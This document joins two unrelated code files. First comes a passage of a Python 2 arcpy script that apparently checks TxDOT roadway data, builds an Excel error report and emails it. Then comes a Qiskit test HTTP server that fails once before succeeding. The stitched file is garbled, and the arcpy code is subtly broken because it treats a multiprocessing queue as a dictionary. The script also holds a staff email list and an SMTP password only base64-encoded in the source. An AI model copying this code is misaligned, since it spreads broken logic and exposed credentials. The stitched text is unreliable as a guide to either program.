errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append("Has vertex with zero measure, apply measures.")
if errorinfo not in errors:
errors.append(errorinfo)
counter += 1
if m >= lastM:
errorinfo = []
errorinfo.append(row.OBJECTID)
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append("LG or XG with non-decreasing measure, Re-apply measures.")
if errorinfo not in errors:
errors.append(errorinfo)
counter += 1
elif row.RDBD_TYPE == "KG" or row.RDBD_TYPE == "AG" or row.RDBD_TYPE == "XG":
if math.isnan(m):
errorinfo = []
errorinfo.append(row.OBJECTID)
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append("Has vertex with zero measure, apply measures.")
if errorinfo not in errors:
errors.append(errorinfo)
counter += 1
if m <= lastM:
errorinfo = []
errorinfo.append(row.OBJECTID)
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append("KG, AG, or XG with non-increasing measure, Re-apply measures.")
if errorinfo not in errors:
errors.append(errorinfo)
counter += 1
lastX = x
lastY = y
lastM = m
except:
errorinfo = []
errorinfo.append(row.OBJECTID)
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append("Geometry Error. Please check geometry.")
errors.append(errorinfo)
counter += 1
print str(counter) + " multipart and vertex measure errors."
d[removevertices] = errors
arcpy.AddMessage("Creating PNGs...")
arcpy.AddMessage("Exporting 1 of 3...")
mxd = arcpy.mapping.MapDocument("T:\\DATAMGT\\MAPPING\\Data Quality Checks\\Error_Check_Scripts\\MeasureErrors.mxd")
arcpy.mapping.ExportToPNG(mxd, workspace + "\\Measure Errors " + str(today) + ".png")
del mxd
arcpy.AddMessage("Exporting 2 of 3...")
mxd = arcpy.mapping.MapDocument(
"T:\\DATAMGT\\MAPPING\\Data Quality Checks\\Error_Check_Scripts\\MeasureErrors_LG_XG.mxd")
arcpy.mapping.ExportToPNG(mxd, workspace + "\\Measure LG XG Red is Bad " + str(today) + ".png")
del mxd
arcpy.AddMessage("Exporting 3 of 3...")
mxd = arcpy.mapping.MapDocument(
"T:\\DATAMGT\\MAPPING\\Data Quality Checks\\Error_Check_Scripts\\MeasureErrors_Not_LG_XG.mxd")
arcpy.mapping.ExportToPNG(mxd, workspace + "\\Measure RG AG Red is Bad " + str(today) + ".png")
del mxd
arcpy.AddMessage("PNGs Complete.")
except:
print "!!!REMOVE VERTICIES FAILED!!!"
def onsystem(d):
try:
arcpy.AddMessage("Starting on-system attribute and measure checks...")
counter = 0
atterrors = []
measerrors = []
query = """ (RTE_CLASS ='1' or RTE_CLASS ='6') AND RDBD_TYPE <> 'RAMP' AND RDBD_TYPE <> 'TURNAROUND' AND RDBD_TYPE <> 'CONNECTOR' """
cursor = arcpy.SearchCursor(roadways, query)
for row in cursor:
idpfx = row.RTE_ID[:2]
if row.RTE_PRFX != idpfx:
if row.RDBD_TYPE != "CNCTR-GS":
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(row.RTE_PRFX)
errorinfo.append(idpfx)
errorinfo.append("RTE_PRFX inconsistent with RTE_ID")
atterrors.append(errorinfo)
counter += 1
nmpfx = row.RTE_NM[:2]
if row.RTE_PRFX != nmpfx:
if row.RDBD_TYPE != "CNCTR-GS":
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(row.RTE_PRFX)
errorinfo.append(nmpfx)
errorinfo.append("RTE_PRFX inconsistent with RTE_NM")
atterrors.append(errorinfo)
counter += 1
idtype = row.RTE_ID[-2:]
if row.RDBD_TYPE != idtype:
if row.RDBD_TYPE != "RAMP" and row.RDBD_TYPE != "CONNECTOR" and row.RDBD_TYPE != "TURNAROUND" and row.RDBD_TYPE != "CNCTR-GS" and row.RDBD_TYPE != "OTHER":
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(row.RDBD_TYPE)
errorinfo.append(idtype)
errorinfo.append("RDBD_TYPE inconsistent with RTE_ID")
atterrors.append(errorinfo)
counter += 1
if row.RTE_NBR is None:
idnbr = row.RTE_ID[2:6]
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append("NULL")
errorinfo.append(idnbr)
errorinfo.append("RTE_NBR is Null. Populate RTE_NBR.")
atterrors.append(errorinfo)
counter += 1
txtRTE_NBR = ""
elif len(row.RTE_NBR) == 1:
txtRTE_NBR = "000" + row.RTE_NBR
elif len(row.RTE_NBR) == 2:
txtRTE_NBR = "00" + row.RTE_NBR
elif len(row.RTE_NBR) == 3:
txtRTE_NBR = "0" + row.RTE_NBR
else:
txtRTE_NBR = row.RTE_NBR
nmnbr = row.RTE_NM[2:6]
if txtRTE_NBR != nmnbr:
if row.RDBD_TYPE != "CNCTR-GS":
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(txtRTE_NBR)
errorinfo.append(nmnbr)
errorinfo.append("RTE_NBR inconsistent with RTE_NM")
atterrors.append(errorinfo)
counter += 1
idnbr = row.RTE_ID[2:6]
if txtRTE_NBR != idnbr:
if row.RDBD_TYPE != "CNCTR-GS":
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(txtRTE_NBR)
errorinfo.append(idnbr)
errorinfo.append("RTE_NBR inconsistent with RTE_ID")
atterrors.append(errorinfo)
counter += 1
if len(row.RTE_NM) == 7:
nmsfx = row.RTE_NM[-1:]
if row.RTE_SFX != nmsfx:
if row.RDBD_TYPE != "CNCTR-GS":
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(row.RTE_SFX)
errorinfo.append(nmsfx)
errorinfo.append("RTE_SFX inconsistent with RTE_NM")
atterrors.append(errorinfo)
counter += 1
idsfx = row.RTE_ID[6:7]
if row.RTE_SFX != idsfx:
if row.RDBD_TYPE != "CNCTR-GS":
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(row.RTE_SFX)
errorinfo.append(idsfx)
errorinfo.append("RTE_SFX inconsistent with RTE_ID")
atterrors.append(errorinfo)
counter += 1
id = row.RTE_ID
geom = row.shape
ext = geom.extent
Mmin = round(ext.MMin, 3)
Mmax = round(ext.MMax, 3)
Mdiff = abs(Mmax - Mmin)
wholelen = geom.length * .000621371
shp_len = float(format(float(wholelen), '.3f'))
rte_len = row.RTE_LEN
testlen = abs(shp_len - Mdiff)
if rte_len is not None and id is not None:
if testlen <= .003 and abs(rte_len - shp_len) > .003:
errorinfo = []
errorinfo.append(id)
errorinfo.append(Mdiff)
errorinfo.append(shp_len)
errorinfo.append(rte_len)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append(abs(rte_len - shp_len))
measerrors.append(errorinfo)
counter += 1
elif abs(shp_len - Mdiff) > .003:
errorinfo = []
errorinfo.append(id)
errorinfo.append(Mdiff)
errorinfo.append(shp_len)
errorinfo.append(rte_len)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append(abs(shp_len - Mdiff))
measerrors.append(errorinfo)
counter += 1
elif abs(rte_len - Mdiff) > .003:
errorinfo = []
errorinfo.append(id)
errorinfo.append(Mdiff)
errorinfo.append(shp_len)
errorinfo.append(rte_len)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append(abs(rte_len - Mdiff))
measerrors.append(errorinfo)
counter += 1
elif abs(shp_len - rte_len) > .003:
errorinfo = []
errorinfo.append(id)
errorinfo.append(Mdiff)
errorinfo.append(shp_len)
errorinfo.append(rte_len)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append(abs(shp_len - rte_len))
measerrors.append(errorinfo)
counter += 1
else:
pass
else:
oid = str(row.OBJECTID)
id = str(row.RTE_ID)
errorinfo = []
errorinfo.append(id)
errorinfo.append(str(Mdiff))
errorinfo.append(str(shp_len))
errorinfo.append(str(rte_len))
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append("OID: " + oid)
measerrors.append(errorinfo)
counter += 1
arcpy.AddMessage(str(counter) + " on system attribute and measure errors.")
errors = [atterrors, measerrors]
d[onsystem] = errors
except:
print "!!!ONSYSTEM FAILED!!!"
def offsysatt(d):
try:
arcpy.AddMessage("Starting off-system attribute check...")
counter = 0
errors = []
query = """ (RTE_CLASS = '2' OR RTE_CLASS = '3') AND RDBD_TYPE = 'KG' """
cursor = arcpy.SearchCursor(roadways, query)
for row in cursor:
if row.RTE_CLASS == '2':
nmpfx1 = row.RTE_NM[3:5]
nmpfx2 = row.RTE_NM[3:4]
if row.RTE_PRFX == nmpfx1 or row.RTE_PRFX == nmpfx2:
pass
else:
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(row.RTE_PRFX)
errorinfo.append(nmpfx1)
errorinfo.append("RTE_PRFX inconsistent with RTE_NM")
errors.append(errorinfo)
counter += 1
idpfx1 = row.RTE_ID[3:5]
idpfx2 = row.RTE_ID[3:4]
if row.RTE_PRFX == idpfx1 or row.RTE_PRFX == idpfx2:
pass
else:
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(row.RTE_PRFX)
errorinfo.append(idpfx1)
errorinfo.append("RTE_PRFX inconsistent with RTE_ID")
errors.append(errorinfo)
counter += 1
if row.RTE_ID != row.RTE_NM:
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(row.RTE_ID)
errorinfo.append(row.RTE_NM)
errorinfo.append("RTE_ID inconsistent with RTE_NM")
errors.append(errorinfo)
counter += 1
if len(row.RTE_NBR) == 1:
txtRTE_NBR = "000" + row.RTE_NBR
elif len(row.RTE_NBR) == 2:
txtRTE_NBR = "00" + row.RTE_NBR
elif len(row.RTE_NBR) == 3:
txtRTE_NBR = "0" + row.RTE_NBR
else:
txtRTE_NBR = row.RTE_NBR
nmnbr1 = row.RTE_NM[5:9]
nmnbr2 = row.RTE_NM[4:9]
if txtRTE_NBR == nmnbr1 or txtRTE_NBR == nmnbr2:
pass
else:
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(txtRTE_NBR)
errorinfo.append(nmnbr2)
errorinfo.append("RTE_NBR inconsistent with RTE_NM")
errors.append(errorinfo)
counter += 1
idnbr1 = row.RTE_ID[5:9]
idnbr2 = row.RTE_ID[4:9]
if txtRTE_NBR == idnbr1 or txtRTE_NBR == idnbr2:
pass
else:
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(txtRTE_NBR)
errorinfo.append(idnbr2)
errorinfo.append("RTE_NBR inconsistent with RTE_ID")
errors.append(errorinfo)
counter += 1
if row.RTE_CLASS == '3':
if row.RTE_PRFX != "FC":
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(row.RTE_PRFX)
errorinfo.append(row.RTE_CLASS)
errorinfo.append("RTE_PRFX inconsistent with RTE_CLASS")
errors.append(errorinfo)
counter += 1
if row.RTE_NM is None:
pass
elif len(row.RTE_NM) > 1:
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(row.RTE_NM)
errorinfo.append(row.RTE_CLASS)
errorinfo.append("RTE_NM should not be populated for RTE_CLASS = 3")
errors.append(errorinfo)
counter += 1
if len(row.RTE_ID) > 6:
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(row.RTE_ID)
errorinfo.append(row.RTE_CLASS)
errorinfo.append("RTE_ID should not be more than 6 characters long")
errors.append(errorinfo)
counter += 1
if row.RTE_NBR is None:
pass
elif len(row.RTE_NBR) > 1:
errorinfo = []
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NBR)
errorinfo.append(row.RTE_NBR)
errorinfo.append(row.RTE_CLASS)
errorinfo.append("RTE_NBR should be blank")
errors.append(errorinfo)
counter += 1
arcpy.AddMessage(str(counter) + " off system attribute errors.")
d[offsysatt] = errors
except:
print "!!!OFFSYSTEM ATTRIBUTE FAILED!!!"
def screenlines(d):
try:
arcpy.AddMessage("Starting screen lines check...")
arcpy.CreateFileGDB_management(workspace, "SL_Working.gdb")
slbase = workspace + "\\SL_Working.gdb"
comancheSL = "Database Connections\\Connection to Comanche.sde\\TPP_GIS.APP_TPP_GIS_ADMIN.QAQC\\TPP_GIS.APP_TPP_GIS_ADMIN.Screen_Lines"
Screen_Lines = slbase + "\\Screen_Lines"
Screen_Join_Output_shp = slbase + "\\Screen_Join_Output"
OnSystem_Roadways = slbase + "\\OnSystem_Roadways"
Screen_Line_Intersect_shp = slbase + "\\Screen_Line_Intersect"
Screen_Line_Result_dbf = slbase + "\\Screen_Line_Result"
Screen_Lines_Summarized_dbf = slbase + "\\Screen_Lines_Summarized"
Output_Event_Table_Properties = "RID POINT MEAS"
print "Screen Lines (1/8): Exporting Screen Lines"
arcpy.FeatureClassToFeatureClass_conversion(comancheSL, slbase, "Screen_Lines")
print "Screen Lines (2/8): Joining with Districts from Comanche"
arcpy.SpatialJoin_analysis(Screen_Lines, txdotdist, Screen_Join_Output_shp, "JOIN_ONE_TO_ONE", "KEEP_ALL")
print "Screen Lines (3/8): Exporting On-System Roadways"
arcpy.FeatureClassToFeatureClass_conversion(txdotroads, slbase, "OnSystem_Roadways",
"""RTE_CLASS = '1' AND RTE_OPEN = 1""")
print "Screen Lines (4/8): Intersecting Screen Lines with Roadbeds"
arcpy.Intersect_analysis([OnSystem_Roadways, Screen_Join_Output_shp], Screen_Line_Intersect_shp, "ALL", "", "POINT")
print "Screen Lines (5/8): Locating Points along Routes"
arcpy.LocateFeaturesAlongRoutes_lr(Screen_Line_Intersect_shp, OnSystem_Roadways, "RTE_ID", "0 Meters",
Screen_Line_Result_dbf, Output_Event_Table_Properties)
print "Screen Lines (6/8): Calculating Summary Statistics"
arcpy.Statistics_analysis(Screen_Line_Result_dbf, Screen_Lines_Summarized_dbf,
"MEAS MIN;MEAS MAX;DIST_NM FIRST;DIST_NBR FIRST", "SCREEN_ID")
print "Screen Lines (7/8): Adding Difference Column"
arcpy.AddField_management(Screen_Lines_Summarized_dbf, "DIFFERENCE", "FLOAT")
# print "Calculating Difference Column"
# arcpy.CalculateField_management(Screen_Lines_Summarized_dbf, "DIFFERENCE", "Abs ([MAX_MEAS]- [MIN_MEAS])", "VB", "")
print "Screen Lines (8/8): Compiling Errors"
errors = []
cursor = arcpy.UpdateCursor(Screen_Lines_Summarized_dbf)
for row in cursor:
screen = row.getValue("SCREEN_ID")
minimum = row.getValue("MIN_MEAS")
maximum = row.getValue("MAX_MEAS")
distnm = row.getValue("FIRST_DIST_NM")
distnbr = row.getValue("FIRST_DIST_NBR")
diff = abs(maximum - minimum)
thediff = format(float(diff), '.3f')
thisrow = [str(screen), str(minimum), str(maximum), str(distnm), str(distnbr), str(thediff)]
errors.append(thisrow)
row.setValue("DIFFERENCE", thediff)
cursor.updateRow(row)
del cursor
del row
d[screenlines] = errors
print "time to return"
except:
print "!!!SCREEN LINES FAILED!!!"
def assemblereport(check1, check2, check3, check4, check5, check6, check7, check8, check9):
global book
arcpy.AddMessage("Beginning error checks...")
if check1 == "true":
check2 = "true"
check3 = "true"
check4 = "true"
check5 = "true"
check6 = "true"
check7 = "true"
check8 = "true"
check9 = "true"
font = xlwt.Font() # Create the Font
font.name = 'Calibri'
font.height = 240 # =point size you want * 20
style = xlwt.XFStyle() # Create the Style
style.font = font # Apply the Font to the Style
d = multiprocessing.Queue()
started = []
if check2 == "true":
p = multiprocessing.Process(target=overlap, args=(d,))
p.start()
started.append(p)
if check3 == "true":
p = multiprocessing.Process(target=routeopen, args=(d,))
p.start()
started.append(p)
if check4 == "true":
p = multiprocessing.Process(target=measurelength, args=(d,))
p.start()
started.append(p)
if check5 == "true":
p = multiprocessing.Process(target=subfilelength, args=(d,))
p.start()
started.append(p)
if check6 == "true":
p = multiprocessing.Process(target=removevertices, args=(d,))
p.start()
started.append(p)
if check7 == "true":
p = multiprocessing.Process(target=onsystem, args=(d,))
p.start()
started.append(p)
if check8 == "true":
p = multiprocessing.Process(target=offsysatt, args=(d,))
p.start()
started.append(p)
if check9 == "true":
p = multiprocessing.Process(target=screenlines, args=(d,))
p.start()
started.append(p)
for i in started:
i.join()
results = d.get()
arcpy.AddMessage("Checks complete. Compiling report page for:")
if check2 == "true":
for i in results:
if i[0] == "overlap":
arcpy.AddMessage("Overlap Errors...")
overlapsheet = book.add_sheet("City Boundary Overlap")
oeline = 0
overlapsheet.write(oeline, 0, "RTE_ID", style=style)
overlapsheet.write(oeline, 1, "Overlap Length", style=style)
overlapsheet.write(oeline, 2, "District Name", style=style)
overlapsheet.write(oeline, 3, "District Number", style=style)
overlapsheet.write(oeline, 4, "City Name", style=style)
overlapsheet.write(oeline, 5, "City Number", style=style)
overlapsheet.write(oeline, 7,
"The following Route IDs are County Roads and FC Streets which cross a City Boundary as found in City_OverlapErrors.shp",
style=style)
oeline += 1
overlaplist = i[1]
for i in overlaplist:
if i[3] not in disterrors:
disterrors.append(i[3])
overlapsheet.write(oeline, 0, i[0], style=style)
overlapsheet.write(oeline, 1, i[1], style=style)
overlapsheet.write(oeline, 2, i[2], style=style)
overlapsheet.write(oeline, 3, i[3], style=style)
overlapsheet.write(oeline, 4, i[4], style=style)
overlapsheet.write(oeline, 5, i[5], style=style)
oeline += 1
if check3 == "true":
arcpy.AddMessage("Route Open Errors...")
opensheet = book.add_sheet("Route Open")
roline = 0
opensheet.write(roline, 0, "RTE_ID", style=style)
opensheet.write(roline, 1, "RTE_OPEN", style=style)
opensheet.write(roline, 2, "HIGHWAY_STATUS", style=style)
opensheet.write(roline, 3, "Description", style=style)
opensheet.write(roline, 4, "District Number", style=style)
opensheet.write(roline, 6,
"The following Route IDs contain an error between RTE_OPEN in TxDOT_Roadways and ROADWAY_STATUS in SUBFILES",
style=style)
roline += 1
openlist = d[routeopen]
for i in openlist:
if i[4] not in disterrors:
disterrors.append(i[4])
opensheet.write(roline, 0, i[0], style=style)
opensheet.write(roline, 1, i[1], style=style)
opensheet.write(roline, 2, i[2], style=style)
opensheet.write(roline, 3, i[3], style=style)
opensheet.write(roline, 4, i[4], style=style)
roline += 1
if check4 == "true":
arcpy.AddMessage("OffSystem Geometry & Measure Errors...")
geomsheet = book.add_sheet("OffSystem Geometry & Measures")
ogline = 0
geomsheet.write(ogline, 0, "RTE_ID", style=style)
geomsheet.write(ogline, 1, "Measures' Length", style=style)
geomsheet.write(ogline, 2, "Shape Length", style=style)
geomsheet.write(ogline, 3, "RTE_LEN", style=style)
geomsheet.write(ogline, 4, "District Name", style=style)
geomsheet.write(ogline, 5, "District Number", style=style)
geomsheet.write(ogline, 6, "Difference", style=style)
geomsheet.write(ogline, 8,
"The following Route IDs contain an error between their measures' length, shape length, and RTE_LEN",
style=style)
ogline += 1
geomlist = d[measurelength]
for i in geomlist:
if i[5] not in disterrors:
disterrors.append(i[5])
geomsheet.write(ogline, 0, i[0], style=style)
geomsheet.write(ogline, 1, i[1], style=style)
geomsheet.write(ogline, 2, i[2], style=style)
geomsheet.write(ogline, 3, i[3], style=style)
geomsheet.write(ogline, 4, i[4], style=style)
geomsheet.write(ogline, 5, i[5], style=style)
geomsheet.write(ogline, 6, i[6], style=style)
ogline += 1
if check5 == "true":
arcpy.AddMessage("Subfile Length Errors...")
subsheet = book.add_sheet("Subfile Lengths")
sfline = 0
subsheet.write(sfline, 0, "RTE_ID", style=style)
subsheet.write(sfline, 1, "District Number", style=style)
subsheet.write(sfline, 2, "BMP", style=style)
subsheet.write(sfline, 3, "Min Measure", style=style)
subsheet.write(sfline, 4, "EMP", style=style)
subsheet.write(sfline, 5, "Max Measure", style=style)
subsheet.write(sfline, 6, "Subfile Len", style=style)
subsheet.write(sfline, 7, "RTE_LEN", style=style)
subsheet.write(sfline, 8, "Description", style=style)
subsheet.write(sfline, 10, "The following Route IDs contain an error between their line and SUBFILES lengths",
style=style)
sfline += 1
sublist = d[subfilelength]
for i in sublist:
if i[1] not in disterrors:
disterrors.append(i[1])
subsheet.write(sfline, 0, i[0], style=style)
subsheet.write(sfline, 1, i[1], style=style)
subsheet.write(sfline, 2, i[2], style=style)
subsheet.write(sfline, 3, i[3], style=style)
subsheet.write(sfline, 4, i[4], style=style)
subsheet.write(sfline, 5, i[5], style=style)
subsheet.write(sfline, 6, i[6], style=style)
subsheet.write(sfline, 7, i[7], style=style)
subsheet.write(sfline, 8, i[8], style=style)
sfline += 1
if check6 == "true":
arcpy.AddMessage("Multipart Errors and Measure Errors...")
multisheet = book.add_sheet("Multipart & Measure Errors")
mmline = 0
multisheet.write(mmline, 0, "OBJECTID", style=style)
multisheet.write(mmline, 1, "RTE_ID", style=style)
multisheet.write(mmline, 2, "District Name", style=style)
multisheet.write(mmline, 3, "District Number", style=style)
multisheet.write(mmline, 4, "Description", style=style)
multisheet.write(mmline, 6, "The following Object IDs are multipart features or have measure errors.",
style=style)
mmline += 1
multilist = d[removevertices]
for i in multilist:
if i[3] not in disterrors:
disterrors.append(i[3])
multisheet.write(mmline, 0, i[0], style=style)
multisheet.write(mmline, 1, i[1], style=style)
multisheet.write(mmline, 2, i[2], style=style)
multisheet.write(mmline, 3, i[3], style=style)
multisheet.write(mmline, 4, i[4], style=style)
mmline += 1
if check7 == "true":
arcpy.AddMessage("OnSystem Attribute and Geometry & Measure Checks...")
onsysatt = book.add_sheet("OnSystem Attributes")
onsysmeas = book.add_sheet("OnSystem Geometry & Measures")
online = 0
onsysatt.write(online, 0, "RTE_ID", style=style)
onsysatt.write(online, 1, "District Number", style=style)
onsysatt.write(online, 2, "Comparison Field", style=style)
onsysatt.write(online, 3, "Comparison Field", style=style)
onsysatt.write(online, 4, "Description", style=style)
onsysatt.write(online, 6, "The following Object IDs are on-system attribute errors.", style=style)
onsysmeas.write(online, 0, "RTE_ID", style=style)
onsysmeas.write(online, 1, "Measures' Length", style=style)
onsysmeas.write(online, 2, "Shape Length", style=style)
onsysmeas.write(online, 3, "RTE_LEN", style=style)
onsysmeas.write(online, 4, "District Name", style=style)
onsysmeas.write(online, 5, "District Number", style=style)
onsysmeas.write(online, 6, "Difference", style=style)
onsysmeas.write(online, 8,
"The following Route IDs contain an error between their measures' length, shape length, and RTE_LEN",
style=style)
online += 1
onsyslist = d[onsystem]
atty = onsyslist[0]
measy = onsyslist[1]
for i in atty:
if i[1] not in disterrors:
disterrors.append(i[1])
onsysatt.write(online, 0, i[0], style=style)
onsysatt.write(online, 1, i[1], style=style)
onsysatt.write(online, 2, i[2], style=style)
onsysatt.write(online, 3, i[3], style=style)
onsysatt.write(online, 4, i[4], style=style)
online += 1
online = 1
for i in measy:
if i[5] not in disterrors:
disterrors.append(i[5])
onsysmeas.write(online, 0, i[0], style=style)
onsysmeas.write(online, 1, i[1], style=style)
onsysmeas.write(online, 2, i[2], style=style)
onsysmeas.write(online, 3, i[3], style=style)
onsysmeas.write(online, 4, i[4], style=style)
onsysmeas.write(online, 5, i[5], style=style)
onsysmeas.write(online, 6, i[6], style=style)
online += 1
if check8 == "true":
arcpy.AddMessage("OffSystem Attribute Checks...")
offatt = book.add_sheet("OffSystem Attributes")
oaline = 0
offatt.write(oaline, 0, "RTE_ID", style=style)
offatt.write(oaline, 1, "District Number", style=style)
offatt.write(oaline, 2, "Comparison Field", style=style)
offatt.write(oaline, 3, "Comparison Field", style=style)
offatt.write(oaline, 4, "Description", style=style)
offatt.write(oaline, 6, "The following Object IDs are off-system attribute errors.", style=style)
oaline += 1
offattlist = d[offsysatt]
for i in offattlist:
if i[1] not in disterrors:
disterrors.append(i[1])
offatt.write(oaline, 0, i[0], style=style)
offatt.write(oaline, 1, i[1], style=style)
offatt.write(oaline, 2, i[2], style=style)
offatt.write(oaline, 3, i[3], style=style)
offatt.write(oaline, 4, i[4], style=style)
oaline += 1
if check9 == "true":
arcpy.AddMessage("Screen Line Checks...")
sline = book.add_sheet("Screen Lines")
scline = 0
sline.write(scline, 0, "SCREEN_ID", style=style)
sline.write(scline, 1, "Min_Meas", style=style)
sline.write(scline, 2, "Max_Meas", style=style)
sline.write(scline, 3, "Dist_Name", style=style)
sline.write(scline, 4, "Dist_Nbr", style=style)
sline.write(scline, 5, "Difference", style=style)
sline.write(scline, 6, "The following are screen line errors.", style=style)
scline += 1
slinelist = d[screenlines]
for i in slinelist:
if i[4] not in disterrors:
disterrors.append(i[4])
sline.write(scline, 0, i[0], style=style)
sline.write(scline, 1, i[1], style=style)
sline.write(scline, 2, i[2], style=style)
sline.write(scline, 3, i[3], style=style)
sline.write(scline, 4, i[4], style=style)
sline.write(scline, 5, i[5], style=style)
scline += 1
return
def email():
try:
tdrive = "T:\\DATAMGT\\MAPPING\\Data Quality Checks\\Errors_" + str(today)
shutil.copytree(workspace, tdrive, ignore=shutil.ignore_patterns('*.gdb'))
print "Copied to T Drive."
analyst = {}
analyst[1] = 'Tom.Neville@txdot.gov'
analyst[2] = 'Chris.Bardash@txdot.gov'
analyst[3] = 'David.Messineo@txdot.gov'
analyst[4] = 'Richard.Barrientos@txdot.gov'
analyst[5] = 'Richard.Barrientos@txdot.gov'
analyst[6] = 'Jason.Ferrell@txdot.gov'
analyst[7] = 'Jason.Kleinert@txdot.gov'
analyst[8] = 'Jason.Kleinert@txdot.gov'
analyst[9] = 'Samuel.Bogle@txdot.gov'
analyst[10] = 'Jeff.Wilhelm@txdot.gov'
analyst[11] = 'Jeremy.Rogers@txdot.gov'
analyst[12] = 'Aja.Davidson@txdot.gov'
analyst[13] = 'Jennifer.Sylvester@txdot.gov'
analyst[14] = 'Jennifer.Sylvester@txdot.gov'
analyst[15] = 'Travis.Scruggs@txdot.gov'
analyst[16] = 'David.Hickman@txdot.gov'
analyst[17] = 'Aja.Davidson@txdot.gov'
analyst[18] = 'Tom.Neville@txdot.gov'
analyst[19] = 'Jeff.Wilhelm@txdot.gov'
analyst[20] = 'Jeremy.Rogers@txdot.gov'
analyst[21] = 'David.Hickman@txdot.gov'
analyst[22] = 'Travis.Scruggs@txdot.gov'
analyst[23] = 'Samuel.Bogle@txdot.gov'
analyst[24] = 'Jason.Ferrell@txdot.gov'
analyst[25] = 'David.Messineo@txdot.gov'
# TO = []
# for n in disterrors:
# address = analyst[n]
# if address not in TO:
# TO.append(address)
FROM = 'adam.breznicky@txdot.gov'
TO = ['adam.breznicky@txdot.gov']
SUBJECT = "Error Checks for " + runday
TEXT = "You are receiving this email because your district(s) was listed within the error checks run on " \
+ runday + ".\nPlease review the error checks report and fix all errors within your district at your" \
" earliest convenience.\nYou can find a copy of the Error Checks here:\n\n" \
+ tdrive + "\n\nLove, Adam"
message = """\From: %s\nTo: %s\nSubject: %s\n\n%s
""" % (FROM, ", ".join(TO), SUBJECT, TEXT)
username = "adam.breznicky@txdot.gov"
password = base64.b64decode("U2F0dXJkYXkxMjM=")
server = smtplib.SMTP('owa.txdot.gov', 25)
server.ehlo()
server.starttls()
server.ehlo()
server.login(username, password)
server.sendmail(FROM, TO, message)
server.close()
print "Emails delivered."
except:
arcpy.AddMessage("Failed to copy to the T-Drive and send emails.")
book = xlwt.Workbook()
if __name__ == '__main__':
nowS = datetime.datetime.now()
arcpy.AddMessage("and away we go... " + str(nowS))
copylocal()
assemblereport(allchecks, cityoverlaps, routeopens, offgeommeas, sublen, multimeasPNG, onattmeas, offatt, scnln)
print "Saving excel error report..."
book.save(workspace + "\\ErrorReport_" + today + ".xls")
email()
now = datetime.datetime.now()
arcpy.AddMessage("that's all folks!")
arcpy.AddMessage("started: " + str(nowS))
arcpy.AddMessage("finished: " + str(now))
|
http_server.py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""HTTP server for testing purposes."""
import json
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Dict
class BaseHandler(BaseHTTPRequestHandler):
"""Base request handler for testing."""
good_response = {}
error_response = {}
def _get_code(self):
"""Get the status code to be returned."""
return 200
def _get_response_data(self):
"""Get the response data to be returned."""
return self.good_response
def _get_error_data(self):
"""Get the error data to be returned."""
return self.error_response
def _respond(self):
"""Respond to the client."""
code = self._get_code()
self.send_response(code)
self.send_header("Content-type", "application/json")
self.end_headers()
self.rfile.read(int(self.headers.get("Content-Length", 0)))
data = self._get_response_data() if code == 200 else self._get_error_data()
self.wfile.write(json.dumps(data).encode(encoding="utf_8"))
def do_GET(self):
"""Process a GET request."""
# pylint: disable=invalid-name
self._respond()
def do_POST(self):
"""Process a POST request."""
# pylint: disable=invalid-name
self._respond()
def do_PUT(self):
"""Process a PUT request."""
# pylint: disable=invalid-name
self._respond()
class ServerErrorOnceHandler(BaseHandler):
"""Request handler that returns a server error once then a good response."""
bad_status_given = {}
def _get_code(self):
"""Return 200 if the path was seen before, otherwise 504."""
if self.bad_status_given.get(self.path):
return 200
self.bad_status_given[self.path] = True
return 504
